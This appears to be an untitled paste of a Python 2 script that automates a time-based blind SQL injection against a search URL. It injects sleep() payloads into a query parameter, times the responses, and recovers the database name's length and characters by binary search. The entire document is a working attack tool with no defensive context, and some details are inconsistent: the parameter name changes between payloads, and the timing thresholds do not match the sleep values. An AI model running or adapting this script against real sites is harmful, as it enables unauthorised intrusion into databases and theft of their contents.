Untitled

#!/usr/bin/python

import requests
import time

url_len = "https://hihi.com/search?bien1=ABC&bien2[9999'*(select * from (select(sleep(2-(if(length(DATABASE())>%d,0,2)))))xxx)*'9999][]=16"

r = []

def request_url(url):
    requests.get(url)

def exploit_payload(url):
    start = time.time()
    request_url(url)
    end = time.time() - start
    return end

def get_result(url):
    l = 32
    h = 126
    while(l != h):
        m = (l + h)/2
        fu = url % m
        print url
        if(exploit_payload(fu)>6):
            l = m + 1
        else:
            h = m
    return h

x = 1
len = 0

while True:
    u = url_len % x
    print u
    t = exploit_payload(u)
    if(t < 6):
        len = x
        break
    x += 1

print 'Length: ' + str(len)

for i in range(len):
    i += 1
    s1 = 'MID(DATABASE(),%s,1)' % str(i)
    s2 = "https://hihi.com/search?bien1=ABC&bienla[9999'*(select * from (select(sleep(2-(if(ORD("+s1+")>%d,0,2)))))xxx)*'9999][]=16"
    r.append(get_result(s2))

result = ''.join([chr(i) for i in r])

print 'Database: ' + result